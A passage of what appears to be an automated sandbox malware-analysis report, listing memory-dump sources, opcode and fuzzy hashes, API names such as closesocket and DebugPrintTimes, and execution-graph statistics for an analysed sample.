                                                                                                                                                • Instruction Fuzzy Hash: 2C3159B5601784EFF726CB24C408F8977ECEF057A8F050885E88157A92CFB5FA81CA56
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: d2
                                                                                                                                                • API String ID: 0-2767080420
                                                                                                                                                • Opcode ID: f01999b3b8870623831126305ba72d397790146b415d5d269e4fa34df62aa9bc
                                                                                                                                                • Instruction ID: 9ecfb59ff309f9107055f6960a2a263bc20a6cc8d0e0d4d0549f66aa3884216b
                                                                                                                                                • Opcode Fuzzy Hash: f01999b3b8870623831126305ba72d397790146b415d5d269e4fa34df62aa9bc
                                                                                                                                                • Instruction Fuzzy Hash: CBE10275D00708DFDB25CFA9C980A9DBBF9FF48314F20452AE986A7660DB71A881CF51
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $$@
                                                                                                                                                • API String ID: 3446177414-1194432280
                                                                                                                                                • Opcode ID: e47e98aae6dc31b981b5b54d974e101d35f32fd56bb7bbafc44d7616afcfa7eb
                                                                                                                                                • Instruction ID: a81369a9c0fadf5f775d6f5c7daf261313afac7f318e474f49579c8be739ebf1
                                                                                                                                                • Opcode Fuzzy Hash: e47e98aae6dc31b981b5b54d974e101d35f32fd56bb7bbafc44d7616afcfa7eb
                                                                                                                                                • Instruction Fuzzy Hash: 9F816D71D012699BDB25CF54CC40BDEB7B8AF48704F0041EAEA0AB7250DB709E85CFA5
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                • Opcode ID: 72abecfd70a12a063ec64da3614bd044aaa483ca9c9e99a5fe913a60178ce35e
                                                                                                                                                • Instruction ID: e02f9d1528985a8ad8a6da77b77d1445d188e5353532aed64ca020f972388f14
                                                                                                                                                • Opcode Fuzzy Hash: 72abecfd70a12a063ec64da3614bd044aaa483ca9c9e99a5fe913a60178ce35e
                                                                                                                                                • Instruction Fuzzy Hash: E49103B1205751EFE31ADF28C880B2EB7A9BF84744F040959E9409B296DF78F845CBD6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                • Opcode ID: 24c12706d8d0bfa75f4395a0c96d31976332faf6fb66562903dccf9e13c01d02
                                                                                                                                                • Instruction ID: 721a6a9b6a785c4ea25371b32ac2b9e87c69da11d567338f7f5f3c7c64f97c48
                                                                                                                                                • Opcode Fuzzy Hash: 24c12706d8d0bfa75f4395a0c96d31976332faf6fb66562903dccf9e13c01d02
                                                                                                                                                • Instruction Fuzzy Hash: E9324674D04369DFEB29CF64C994BD9BBB0BF08304F0085E9D949A7291DBB49A84CF91
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: ${l2
                                                                                                                                                • API String ID: 0-1423303449
                                                                                                                                                • Opcode ID: 501d205168db621130c0a1425c78094f7c85755da4403c50b2e0f4747211346b
                                                                                                                                                • Instruction ID: d5ccdb53e8163c6677aefe40a30a3ad96d7b7c0e32fa163218ab01a29fd546dd
                                                                                                                                                • Opcode Fuzzy Hash: 501d205168db621130c0a1425c78094f7c85755da4403c50b2e0f4747211346b
                                                                                                                                                • Instruction Fuzzy Hash: 3AB1ACB16093619FD721DF24D880A5BBBE5FF84794F405A6EF9A4CB290DB30D804CB92
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                • Opcode ID: 1d0e1a59a54fd226fe75eadab10cb0e1aec21e1c9ac9875d0684bae329551325
                                                                                                                                                • Instruction ID: dd4f10190f1bc9b61ad0186a2febf1110d4b92940c0ca384bdd782cabd1a7668
                                                                                                                                                • Opcode Fuzzy Hash: 1d0e1a59a54fd226fe75eadab10cb0e1aec21e1c9ac9875d0684bae329551325
                                                                                                                                                • Instruction Fuzzy Hash: F451BEB5E01648CFEB15CF96C88479DFBF4EF84798F2480AED4459B240EBB09981CB91
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: ^a2
                                                                                                                                                • API String ID: 3446177414-291807427
                                                                                                                                                • Opcode ID: 47ea3fc02953e5fb21513caea1a53843870c474efe35ab7276b1bf3d625cd6d0
                                                                                                                                                • Instruction ID: f027ab1dbb45d20f6d73ff8bd3709aa9c01be0e6bfbb1bd842181f37823a26a5
                                                                                                                                                • Opcode Fuzzy Hash: 47ea3fc02953e5fb21513caea1a53843870c474efe35ab7276b1bf3d625cd6d0
                                                                                                                                                • Instruction Fuzzy Hash: CB419CB9A00201DFDB09CF29C4805597BF6FF99750B64846AEC088B361DB30F881CBE1
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: a2$ma2
                                                                                                                                                • API String ID: 3446177414-2755310377
                                                                                                                                                • Opcode ID: ce38526d608ceb5c9ffb8dba6886f6ac2e13c56260cb7b175313df580e9a321b
                                                                                                                                                • Instruction ID: 710541b057d1b2e5bb479be3b2517f13511b44988b7dcdfdfefdf3cea42c17d3
                                                                                                                                                • Opcode Fuzzy Hash: ce38526d608ceb5c9ffb8dba6886f6ac2e13c56260cb7b175313df580e9a321b
                                                                                                                                                • Instruction Fuzzy Hash: CB11C3B6A01208AFDF11CF98D885ADEBBB8FF4C360F10401AF911B7240D775AA54CBA4

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.2%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:3
                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                execution_graph 12547 10546ab 12548 10546c5 12547->12548 12549 10546d4 closesocket 12548->12549

                                                                                                                                                Control-flow Graph

                                                                                                                                                control_flow_graph 0 10546ab-10546e2 call 102c21b call 10552ab closesocket
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_1020000_ijDRAEBvXKu.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: closesocket
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2781271927-0
                                                                                                                                                • Opcode ID: 23cbed43c04841a1f64366bc08e70969fc8ff187bcf84d30a10d5acbacbcad06
                                                                                                                                                • Instruction ID: b79885d0406518bf09f98b49a9b9d73cd23e8c66560b43ee1f786846e93e9448
                                                                                                                                                • Opcode Fuzzy Hash: 23cbed43c04841a1f64366bc08e70969fc8ff187bcf84d30a10d5acbacbcad06
                                                                                                                                                • Instruction Fuzzy Hash: 0FE08C722002147BD210EAAADC80DEB776CEFCA3A0B004419FA4CA7202C6B1BA0587F0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_1020000_ijDRAEBvXKu.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )j$-z$1$2$2$4$7$8c$D$E$M>$N`$Q*$R$Vs$`$d$k$nz$os$s>$s^$|7$~r$=
                                                                                                                                                • API String ID: 0-680142647
                                                                                                                                                • Opcode ID: 82414673f08bcfd8b7f509060940dd8daa0b5addee3b1fa4194040737e59a542
                                                                                                                                                • Instruction ID: 9ccc744e34c1d640702d38a6a6868358972516df9ef8e1691c6e51b58f594ce4
                                                                                                                                                • Opcode Fuzzy Hash: 82414673f08bcfd8b7f509060940dd8daa0b5addee3b1fa4194040737e59a542
                                                                                                                                                • Instruction Fuzzy Hash: 4742BEB0D05229CFEB64CF48C998BDDBBB6BB85308F1081D9D149AB291C7B55A85CF41
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_1020000_ijDRAEBvXKu.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f3e65ee7bbc9e3b455a2f948679397b4df115a0b3218fac33f1ad6191bc5e0a0
                                                                                                                                                • Instruction ID: 450525914025fe76da948c7715483ddcc2f35a5cd752e503218000f2f09478bc
                                                                                                                                                • Opcode Fuzzy Hash: f3e65ee7bbc9e3b455a2f948679397b4df115a0b3218fac33f1ad6191bc5e0a0
                                                                                                                                                • Instruction Fuzzy Hash: D9B01237F000140589244D89B4800B0F330E287033F2032E3DE0CB74091102D41005CC